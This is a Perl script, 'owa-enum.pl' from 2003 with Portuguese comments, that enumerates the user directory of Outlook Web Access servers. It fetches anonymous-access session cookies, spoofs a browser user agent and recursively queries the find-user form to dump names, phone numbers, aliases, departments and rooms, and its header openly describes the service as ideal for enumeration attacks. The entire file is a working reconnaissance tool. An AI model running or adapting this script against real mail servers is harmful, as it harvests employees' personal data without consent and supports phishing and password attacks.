#!/usr/bin/perl
#
# [KSC4-PERL]----------------------------------------------------------------[]
#
#  OWA-ENUM.PL - Enumera usuarios do Outlook Web Access, versao 0.03.003
#                Por Marco "Kiko" Carnut <kiko@tempest.com.br> 17-jan-2003
#
#  Descricao: O Outlook Web Acess e' o servico de Webmail do Exchange, que
#  ---------- dentre outras coisas oferece uma interface para fazer buscas
#  na base de usuarios -- tornando-o perfeita para ataques de enumeracao.
#  Este script faz varias consultas a esse formulario, tratando os resulta-
#  dos para que saiam em um formato bem simples:
#
#     | Nome | Telefone | Alias | Departamento | Sala |
#
#  (perfeito para importar no Word ou Excel, e prontinho para virar uma
#  tabela no TWiki). O delimitador "|" pode ser mudado, entre outras opes
#  de formatao.
#
#  O script segue a sequencia exata desde a pagina de logon ate' o formulario
#  de busca, reproduzindo os cookies obtidos para manter o controle de sessao.
#  Inicialmente ele tenta uma busca com uma unica letra; caso receba a mensa-
#  gem de que a busca retornaria resultados demais, ele acrescenta recursiva-
#  mente mais letras ate' obter resultados satisfatorios. Assim, ele so' se
#  aprofunda onde estritamente necessario. Por default, ele remove duplicatas,
#  mas isso pode ser desligado via uma opcao na linha de comando.
#
#  A experiencia demonstra que a enumerao oferece bons resultados, mas no
#  foi feita uma verificao para garantir que ela realmente retorne todos
#  os resultados possveis; nomes com caracteres estranhos podem passar desa-
#  percebidos.
#
#  Historico de Revisoes:
#
#  --REV--- -DATA- ---POR--- -------------------DESCRICAO-------------------
#  0.03.003 031120 Kiko      Adicionada busca recursiva com profundidade
#                            adaptativa, baseado na mensagem de "resultados
#                            demais". Adicionada deteccao de duplicatas.
#                            Corrigida a falta de URL encoding, que fazia
#                            com que muitos nomes nao fossem achados. Aumen-
#                            tado o alfabeto default.
#  0.02.002 031120 Kiko      Corrigido erro na deteccao de SSL, adicionado
#                            Getopt e opes para delimitador e string de
#                            preenchimento.
#  0.01.001 030117 Kiko      Verso inicial.
#
# []-------------------------------------------------------------------------[]

use LWP::UserAgent;
use HTTP::Cookies;
eval { require Crypt::SSLeay; };
$ssl_disabled=1 if $@;
use Getopt::Long;
use URI::Escape;

# Vamos fingir ser um IE6 rodando sob Win2K
my $user_agent="Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)";

# Alguns defaults e globais

my $fillstr="";
my $delim="|";
my $nodupecheck=0;
my %already;           # Hash usado na verificacao de duplicatas

# Hash com as opcoes de linha de comando, suas sintaxes e respectivas variaveis

%optctl=(
   "f|fill=s"        => \$fillstr,      # String para preencher os campos vazios
   "delim=s"         => \$delim,        # Delimitador
   "v|verbose"       => \$verbose,      # Modo falante
   "n|no-dupe-check" => \$nodupecheck,  # Desativa a verificao de duplicatas
   "d|debug+"        => \$debug         # Ativa modo de depuracao (nao usado)
);

# Trata as opcoes de liha de comando

Getopt::Long::Configure("no_ignore_case","bundling");
$result=GetOptions(%optctl);

# Pega a URL do OWA da linha de comando e reclama se nao tiver vindo
my $host=shift;
if (!$host || $host !~ "://" ) {
    print <<EOT;
Sintaxe: ./owa-enum.pl [<opcoes>] <URL-base-do-OWA>
        
As <opcoes> podem ser:
    
-v           : modo falante, explica as varias fases da conexao
-f <texto>   : texto de preenchimento para por em campos vazios
--delim <str>: delimitador entre os campos (default="|")
-n           : nao verifica duplicatas
EOT
    exit 0;
}

# Se a URL requer HTTPS mas nao tiver sido possivel carregar o Crypt::SSLeay,
# informa o usuario e aborta

if ($host =~ /https:/oi && $ssl_disabled) {
    print STDERR "Essa instacao do Perl nao suporta HTTPS.\n";
    print STDERR "Instale o modulo Crypt::SSLeay para ativa-lo.\n";
    print STDERR "Deveria ser tao simples quanto digitar:\n\n";
    print STDERR "    perl -MCPAN -e 'install Crypt::SSLeay'\n\n";
    exit 0;
}

# Realiza a pre-autenticacao no site e pega a jarra de cookies resultante.
# Se nao tiver vindo nada, sai com erro

$jar=do_preauth($host);
exit 1 if !$jar;

# Alfabeto-base para a enumeracao

my $alpha="abcdefghijklmnopqrstuvwxyz 0123456789.";

# Realiza a enumeracao em si.

do_enum($host,"",$jar,1);

exit;

# Realiza a enumeracao adaptativa, com a URL-base do OWA em $baseurl, o DN
# inicial da consulta em $q, a referencia para o objeto da jarra de cookies
# em $jar e o nivel atual da recursividade em $level. Se, ao fazer uma con-
# sulta, for recebida o codigo de erro de "resultados demais", ela se chama
# recursivamente para realizar consultas com mais caracteres. H uma con-
# dio para evitar tentativas sem sentido (mltiplos espaos, etc.)

sub do_enum
{
    my ($baseurl,$q,$jar,$level)=@_;
    my $n;
    return if $q =~ /^\s|\s\s|\s[^\s]+\s/oi;
    return if $level>10;
    for ($n=0;$n<length($alpha);$n++) {
        my $qq=$q . substr($alpha,$n,1);
        my $r=do_query($baseurl,$qq,$jar);
        do_enum($baseurl,$qq,$jar,$level+1) if $r==1;
    }
} # do_enum

# Realiza a "pre-autenticacao", que consiste basicamente em obter os cookies
# de sessao na pagina inicial e seguir a sequencia das paginas de formulario,
# simulando o que o usuario faria na mao. A rotina requer como argumento o
# endereco-base do OWA. Em caso de sucesso, retorna uma referecia para o
# objeto da jarra de cookies. Caso algum problema aconteca, retorna undef.
# A rotina tambem se vale da variavel global $verbose para emitir ou nao
# um acompanhamento do progresso.

sub do_preauth
{
    my ($baseurl) = @_;
    my $url="$baseurl/exchange/logon.asp";
    my $ua = LWP::UserAgent->new;
    my $jar= HTTP::Cookies->new;
    $ua->cookie_jar($jar);
    $ua->agent($user_agent);

    print STDERR "Logando para pegar os cookies...\n" if $verbose;
    my $req=new HTTP::Request GET => $url;
    print STDERR "- Pagina inicial de logon\n" if $verbose;
    my $response = $ua->request($req);
    return undef if !$response->is_success;

    #print $response->content;
    #print $jar->as_string();

    #print "\n----------------------------------\n";
    $url="$baseurl/exchange/finduser/root.asp?acs=anon";
    $req=new HTTP::Request GET => $url;
    print STDERR "- Pagina de acesso anonimo\n" if $verbose;
    $response = $ua->request($req);
    return undef if !$response->is_success;
    #print $response->content;

    #print "\n----------------------------------\n";
    $url="$baseurl/exchange/logonfrm.asp";
    $req=new HTTP::Request GET => $url;
    print STDERR "- Pagina do formulario\n" if $verbose;
    $response = $ua->request($req);
    return undef if !$response->is_success;
    #print $response->content;

    if ($verbose) {
        print STDERR "- Cookies pegos:\n". $jar->as_string();
        print STDERR "------------------\n";
    }
    return $jar;
} # do_preauth

# Realiza uma consulta de enumeracao em si. Os argumentos sao: a URL-base do
# OWA; a string a ser consultada; e o objeto da jarra de cookies, ja' com os
# cookies de pre-autenticacao prontos. A rotina imprime os resultados direta-
# mente na saida padrao. Ela usa a variavel global $verbose para imprimir ou
# o andamento das consultas (na saida de erro). A rotina retorna zero se tudo
# sair ok, 1 se tiver recebido o erro de "resultados demais" e 2 se tiver re-
# cebido o erro de "nenhum resultado". A rotina tambem se baseia na variavel
# global $nodupecheck para decidir se deve evitar imprimir duplicatas; e,
# quando neste modo, usa hash global %already para lembrar quem ja' saiu.

sub do_query
{
    my ($baseurl,$q,$jar)=@_;
    my $url="$baseurl/exchange/finduser/fumsg.asp";
    my $ua = LWP::UserAgent->new;
    $ua->cookie_jar($jar);
    $ua->agent($user_agent);

    my $req=new HTTP::Request POST => $url;
    # Preenche o conteudo da query HTTP com os varios campos do
    # formulario -- todos em branco, exceto o DN (que vai URL encoded)
    my $qq=uri_escape($q);
    my $content="DN=$qq&FN=&LN=&TL=&AN=&CP=&DP=&OF=&CY=&ST=&CO=";
    
    # Define o tipo de dado sendo enviado (formulario codificado
    # em URL) e define o conteudo a ser enviado
    $req->content_type('application/x-www-form-urlencoded');
    $req->content($content);

    print STDERR "Buscando DN=$q\n" if $verbose;

    # Realisa a consulta e pega resultado
    my $response = $ua->request($req);
    return unless $response->is_success;
    my $c=$response->content;
    
    return 1 if $c =~ /This query would return too many addresses/oi;
    return 2 if $c =~ /no entry found for this item/oi;
    
    my @l;          # Array para conter as linhas da tabela
    my $nls=0;      # Numero de linhas no array

    # Fatia as linhas do output, colocando-as cada uma em um indice
    # do array @l, pegando o texto delimitado por <tr>...</tr>
    while ($c =~ m/<tr>.*?<\/tr>/soig) {
        $l[$nls++]=$&;
    }

    my @c;         # Array para conter as colunas
    my ($n,$m);    # Iteradores de linhas e colunas

    # Para cada linha
    for ($n=0;$n<$nls;$n++) {
        $m=0;
	    # Fatie cada uma das colunas, pegando o texto delimitado
	    # por <td>...</td>
        while ($l[$n] =~ m/<td>.*?<\/td>/soig) {
	       $c[$n][$m++]=$&;
	    }
    }
    # Para cada linha
    for ($n=1;$n<$nls;$n++) {
        # Comece a acumular o texto de saida, com a barra inicial
        my $text=$delim;
	    # Para cada coluna
        for ($m=0;$m<5;$m++) {
	        # Delete o HTML, deixando so as informacoes em si
	        $c[$n][$m] =~ s/<(?:[^>"]*|(["]).*?\1)*>//gs;
	        # Concatente o texto de saida
	        $text.=$c[$n][$m]?"$c[$n][$m]$delim":"$fillstr$delim";
	    }
	    if ($nodupecheck) {
	        print "$text\n";
	    } else {
	        print "$text\n" unless $already{$text};
	        $already{$text}=1;
	    }
    }
    return 0;
} # do_query
